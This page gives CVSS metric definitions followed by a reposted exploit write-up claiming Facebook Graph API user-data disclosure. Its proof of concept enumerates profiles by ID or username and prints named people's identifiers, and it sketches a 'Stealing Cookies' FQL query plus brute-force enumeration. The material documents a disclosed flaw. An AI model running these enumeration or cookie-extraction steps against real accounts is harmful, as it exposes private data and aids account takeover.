The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
None
A
There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.
Below is a copy: Facebook HTTP Graph API Users ID (and others..) Information Disclosure )
# Exploit Title :
Facebook HTTP Graph API Users ID (and others..) Information Disclosure -OAuthException- and Vulnerable (http) to Brute Force Attack
# *Vendor*: Facebook.com http://graph.facebook.com
# Author: Juan Carlos Garcia (@secnight)(nightsec) ;)
# Blog: http://hackingmadrid.blogspot.com
http://blog.0verl0ad.com/
http://highsec.es
BREIF DESCRIPTION
******************
The Graph API is the primary way that data is retrieved or posted to Facebook. The Getting Started Guide contains an overview of the basics of the API, walks you through using the Graph API Explorer, shows you how names work, how permissions work, what connections are and puts it all together so the rest of this reference make sense.
Users Information Disclosure
**********************
Anyone can access the data from ANY user due to the release of information that produces the "Graph API" because of the functionality they have given to this API for developers.
The "excess" functionality provided in this API make data users are exposed without any need for it any malicious attacker and make a compilation of information (information Ghatering) from the target
It is possible to identify people according to their id as we will be seen in the proof of concept and the insecure HTTP protocol also makes it vulnerable to a brute force attack..
Proof Of Concept ( PoC)
First
***
http://graph.facebook.com/
As you can see, we have a “"GraphMethodException”
"error": {
"message": "Unsupported get request",
"type": "GraphMethodException",
"code": 100
Creating an OAuthException
**********************
http://graph.facebook.com/00000000000000000000000000000000000000000000
{
"error": {
"message": "(#803) Some of the aliases you requested do not exist: 00000000000000000000000000000000000",
"type": "OAuthException",
"code": 803
My Profile ¡!! ;)
http://graph.facebook.com/ADMIN.CANGREJOS
{
"id": "100001678510102",
"name": "Juan Carlos Garcia",
"first_name": "Juan Carlos",
"last_name": "Garcia",
"username": "ADMIN.CANGREJOS",
"gender": "male",
"locale": "es_ES"
}
And we can also do the REVERSE because we have the id..
http://graph.facebook.com/100001678510102
Mark Zuckerberg CEO Facebook
http://graph.facebook.com/zuck
{
"id": "4",-->WTF???? … The number 4 .. Who is id 1,2,3 ????????
"name": "Mark Zuckerberg",
"first_name": "Mark",
"last_name": "Zuckerberg",
"link": "https://www.facebook.com/zuck",
"username": "zuck",
"gender": "male",
"locale": "en_US"
The Reverse
http://graph.facebook.com/4
COOKIES
A list of cookies that were set for the user as represented in FQL. Facebook Query Language (FQL)
Columns
Name
expires
timestamp
name
string
path
string
uid
numeric string
value
string
To access this table you only need a valid access token with basic permissions.
Facebook Login makes it easy to connect with users on your app or website. You can use several methods in the JavaScript or mobile SDKs to speed up the registration process and build a functional system in minutes.
Stealing Cookies
You only need the next SQL Query to extract the cookie
SELECT ... FROM cookies WHERE uid = A
Note: Additional filters on other columns can be specified but they may make the query less efficient.
/Admin
http://graph.facebook.com/admin/
"id": "100005597474065",
"name": "AD Min",
"first_name": "AD",
"last_name": "Min",
"link": "https://www.facebook.com/ad.min",
"username": "ad.min",
"gender": "male",
"locale": "ru_RU"
}
Procedure: Open de links given above and you can play .. No hack, No fun ;)
Special THANKS : Eduardo Arriols Nuñez .. very good newbie ;)
Live Free or Die Hacking
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum